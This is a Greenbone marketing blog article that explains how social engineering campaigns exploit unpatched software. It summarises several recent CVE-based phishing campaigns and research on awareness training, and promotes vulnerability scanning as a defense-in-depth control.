Greenbone Helps Defend Against Advanced Social Engineering Attacks

Urgency, fear, curiosity, trust, greed, sympathy — social engineering has been wildly successful in exploiting human emotions in cyber attacks. Social engineering attacks have been identified as a top root cause in a high number of breaches. Most breach analysis reports place social engineering among the top initial-access techniques. The recent rise in AI-enabled phishing attacks and data theft further gives adversaries the upper hand with contextual personal data and sensitive business information at their disposal.

Verizon’s 2025 Data Breach and Investigations Report (DBIR) attributes “Social Engineering” incident-class with roughly 17% of breaches globally and 20% in the Asia-Pacific (APAC). According to Sprinto, in 2025, social engineering was the initial access vector in ~36% of incidents. For enterprises, the consequences could be disastrous; ransomware, data theft, and operational downtime can induce revenue-shattering outcomes.

Among the most advanced social engineering campaigns lies a critical one-two punch: psychological manipulation combined with sophisticated exploitation of software flaws. Attack trajectories go beyond the “classical” phishing attack to steal a target’s username and password. They seek immediate unauthorized access to their victim’s computer, lateral movement within the local network, and data exfiltration—with one wrong click, in one fell swoop.

In this article, we will look at some sophisticated social engineering campaigns from the recent past; attacks that combine human deception with exploiting unpatched software flaws. Read on to find out more about the social engineering landscape and how proactive vulnerability management with OPENVAS SECURITY INTELLIGENCE supports a defense-in-depth cyber security strategy, including protection against advanced social engineering attacks.

Advanced Social Engineering Attacks Require a “Defense In Depth” Approach

The most sophisticated social engineering attacks blend human deception with technical exploitation. The classic “phishing attack” [T1566] tricks users into entering their credentials, including MFA codes, into a well-crafted, spoofed website. However, in more advanced variants of social engineering attacks, adversaries can achieve remote code execution (RCE) directly on the victim’s system for full system compromise, install persistent malware, or even move laterally within an organization’s internal network [T1210].

Here’s how sophisticated social engineering attacks work:

• Phishing messages deliver malicious file attachments [T1566.001] or links [T1566.002] along with a social context urging the victim to click them [T1204].
• Once clicked, the attacker’s malicious payload is executed. Depending on the design, it may attempt to steal data [T1003][T1005], exploit exposed software weaknesses on the victim’s local system [T1203], or pivot to accessible network services [T1210].
• In some cases, attackers don’t need to communicate with their targets directly. By making malicious resources available on the public Internet [T1189], victims may confront them through deceptive ads [008] or while executing documents or software applications they believe to be safe [T1189][T1204].
• Even if the first-stage social engineering attack does not directly exploit a software vulnerability, adversaries can import malware [T1105] for remote access to the victim’s computer.
• Once inside, adversaries quickly seek to extend their unauthorized access; gain persistence [TA0003], escalate their privileges [TA0004], and move laterally within the network [TA0008].

In all these cases, unpatched software often means the difference between a benign security incident and an expensive data breach scenario. Defense-in-depth cyber security controls including vulnerability management, patching, and network segmentation help ensure that even if a social engineering attempt succeeds, the attacker cannot extend their reach. By continuously identifying and mitigating exploitable weaknesses, vulnerability management limits the blast radius of initial access and stops localized compromises from spreading across the environment.

How Greenbone Helps Defend Against Advanced Social Engineering Attacks

Greenbone helps organizations increase their resilience to advanced social engineering attacks by empowering defenders to close technical security gaps. Greenbone’s OPENVAS ENTERPRISE FEED includes over 200,000 individual vulnerability tests — truly an industry-leading detection engine. The feed is updated daily to ensure coverage of the latest emerging CVEs. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Vulnerability management is considered a fundamental security activity [1][2][3]. By maintaining a continuous vulnerability management process, organizations can significantly reduce the likelihood that a single phishing email or malicious attachment turns into a full-scale breach. Scanning an IT environment allows security teams to identify and remediate flaws that could provide attackers with initial access, but can also help prevent attackers from escalating privileges, moving laterally, or deploying malware after an initial breach. With Greenbone’s new OPENVAS REPORT product offering, enterprises gain clear risk insights across their entire IT infrastructure and can quickly compile advanced compliance reports.

Social Engineering Campaigns Exploiting Unpatched Software

Many advanced social engineering campaigns are known to exploit unpatched software flaws. In this section we will review some real-world campaigns that leverage advanced exploit chaining via file-attachment and link-based attacks. However, the campaigns described below only scratch the surface of known campaigns and new attacks emerge on a continuous basis.

CVE-2025-8088: WinRAR Allows Attackers to Create Malicious Files

In mid-July 2025, ESET observed active exploitation of CVE-2025-8088 (CVSS 8.8), affecting WinRAR, in ongoing social engineering attacks. CVE-2025-8088 allows unauthorized attackers to copy malicious files into sensitive directories, including the Windows Startup folder, to be executed automatically when the victim logs in. The technical details for this campaign were covered in detail on the Greenbone blog in August.

Attacks were attributed to the RomCom (aka Storm-0978, Tropical Scorpius, UNC2596), a Russian-aligned threat actor known for operating its own signature malware (RomCom RAT). During the recent campaign leveraging CVE-2025-8088 in WinRAR, spearphishing emails delivered weaponized RAR archives to target financial, manufacturing, defense, and logistics companies in Europe and Canada. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-8088.

CVE-2025-27915: Malicious Calendar Links to Exploit Zimbra Collaboration Suite

In September 2025, a campaign targeted the Brazilian Military, delivering poisoned .ICS calendar files specially designed to exploit CVE-2025-27915 (CVSS 5.4), a stored cross-site scripting (XSS) vulnerability [CWE-79], in Zimbra Collaboration Suite. The phishing emails were disguised as legitimate invitations from foreign political entities. The .ICS files contained embedded JavaScript that executed automatically when viewed in Zimbra’s Classic Web Client. The iCalendar standard has an extensive history of security risks including XSS vulnerabilities across a number of enterprise software applications.

In the most recent campaign, attackers were able to steal session cookies, email content, contact lists, and create malicious email forwarding rules to continuously exfiltrate communications from victims. Unpatched systems remain vulnerable and continue to be exploited in targeted attacks. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-27915.

CVE-2025-2783: Chrome Sandbox Escape to Deploy Spyware

In March 2025, phishing emails with invites to a Russian policy forum were used to lure victims into clicking on a malicious file. Once executed, the malicious files leveraged CVE-2025-2783 (CVSS 8.3), a sandbox bypass flaw in the Mojo component of Google Chrome for Windows to deploy spyware. The campaign was nicknamed Operation ForumTroll.

CVE‑2025‑2783 stems from a flaw in the Mojo IPC handle-management and only affects the Windows implementation of Google Chrome that allows attackers to bypass Chrome’s sandbox protection to access Windows OS. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2025-2783 for Windows [1].

CVE-2025-24054: Windows NTLM Hash Leak Targeted Against European Entities

In March 2025, phishing emails with attached .library-ms files were delivered in attacks targeting government and private firms in Poland and Romania. The attacks targeted a newly disclosed vulnerability, CVE-2025-24054 (CVSS 5.4) impacting Windows NTLM; exploitation began days after the flaw was disclosed.

.library-ms files are Library Description schemas used to define Windows libraries. The malicious .library-ms files contained links to attacker-controlled resources and were delivered inside ZIP archives or linked via Dropbox. Viewing the file exploited the Windows SMB auth feature to steal NTLM authentication hashes and replayed the hashes to achieve domain compromise and lateral movement in the victims’ networks.

CVE‑2024‑21412: Windows SmartScreen Bypass by DarkGate Operators

In mid-January 2024, the threat-actor group behind DarkGate malware began exploiting CVE-2024-21412 (CVSS 8.1), a bypass of Microsoft Defender SmartScreen caused by incorrect internet-shortcut handling. Phishing emails delivered PDF attachments with embedded links, diverting victims to .URL shortcut files which loaded fake software installers. The installers masqueraded as legitimate software (such as NVIDIA or iTunes) and sideloaded a malicious DLL to deploy DarkGate RAT malware.

The campaign targeted financial organizations across North America, Europe, Asia, and Africa. Microsoft issued a patch for CVE-2024-21412 on February 13th, 2024. However, this campaign wasn’t the first campaign exploiting Windows SmartScreen in social engineering attacks. In 2023, CVE-2023-36025 was similarly observed under active exploitation. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2024-21412 [1][2][3][4][5].

CVE-2024-42009: Roundcube Webmail XSS Flaw Exploited by UNC1151

In June 2025, a sophisticated spear-phishing campaign targeted Polish organizations via CVE‑2024‑42009 (CVSS 9.3) affecting the Roundcube Webmail vulnerability. The flaw is a critical cross-site scripting (XSS) flaw that allows arbitrary JavaScript execution in a user’s browser when simply opening a specially crafted email.

In these attacks, the UNC1151 threat group sent invoice-themed emails which triggered the flaw to register a malicious Service Worker on the victim’s browser. The malware then proxied the legitimate Roundcube login page while silently harvesting credentials, stealing address-books, and executing Business Email Compromise (BEC) attacks. Greenbone’s OPENVAS ENTERPRISE FEED provides detection for CVE‑2024‑42009.

CVE-2023-36884: Windows Search Exploited for RCE by Storm-0978

In mid-2023, threat actors leveraged social engineering to exploit CVE-2023-36884 (CVSS 7.5), a race condition flaw [CWE-362] in Windows Search. The campaign, attributed to the RomCom threat actor, distributed Word documents and exploited urgency surrounding the Ukrainian World Congress targeting staff at defense and government entities in Europe and North America. Once opened, the documents downloaded scripts, injected iframes and staged remote malware to exploit CVE-2023-36884.

The campaign resulted in financial losses, data theft, and operational disruption for targeted organizations while enabling espionage via credential compromise and deployment of persistent remote access malware. Greenbone’s OPENVAS ENTERPRISE FEED includes detection for CVE-2023-36884.

Isn’t User Awareness Training Enough?

Many organizations begin user awareness training programs with high hopes. However, the effectiveness has been called into question. While some findings indicate that training significantly improves recognition of phishing attempts, these gains were found to fade over time without continuous reinforcement [1][2][3]. Improvement was also shown to differ by individual and require time to become effective [4]. Another study found that combining user awareness training with technical controls (e.g., MFA/OTPs and URL/barrier filters) yields better prevention outcomes than training alone [5]. Other studies demonstrated negative findings associated with user awareness training:

• A large-scale study in 2025 found no significant benefits of training on click-rates or reporting rates [6].
• 43% users executed at least one dangerous action over the course of a 15 month study [7].
• Inconsistent reinforcement or unrealistic simulations risk normalizing artificial behaviors, decreasing effectiveness against real-world attacks over time [8].
• While user awareness training showed a slightly positive effect in reducing susceptibility to social engineering, the resulting p-value (0.141) was non-significant [9].
• Annual awareness training did not reduce phishing susceptibility, while simulation-based training resulted in a statistically significant but very small improvement. Furthermore, training has low engagement rates; 75–90% spend less than one minute on training [10].

Therefore, while user awareness training may provide some protection against the most basic social engineering attacks, it is little comfort against highly targeted, sophisticated campaigns.  For high resilience, defenders must plan additional security measures. Vulnerability management is a fundamental defense-in-depth security control for mitigating the impact of sophisticated social engineering attacks. By prioritizing vulnerability patches for assets impacted by flaws identified in active exploitation campaigns, organizations can reduce their risk of unauthorized initial access and prevent a widespread breach.

Summary

The most advanced social engineering attacks are not just out to steal usernames and passwords. Sophisticated social engineering campaigns combine sensitive information to build highly effective triggers. They also deploy technical payloads that seek to exploit software vulnerabilities on the victim’s computer, and within the target’s network. To protect against the worst outcomes, defenders need to use a defense-in-depth strategic approach to cyber security, including continuous vulnerability management. A free trial of Greenbone’s OPENVAS BASIC is available for defenders to scan their enterprise IT infrastructure for emerging threats, including vulnerabilities exploited in advanced social engineering attacks.

Using Greenbone’s suite of security tools, defenders are better positioned to detect software vulnerabilities at scale within their IT environments, prioritize, and patch exposed attack surfaces that APT adversaries are poised to exploit. A free trial of OPENVAS BASIC is a great opportunity to put Greenbone’s security capabilities to the test; OPENVAS SECURITY INTELLIGENCE allows organizations to experience first-hand how automated vulnerability scanning, daily feed updates, and clear risk reporting can empower defenders against evolving social engineering and other exploitation campaigns.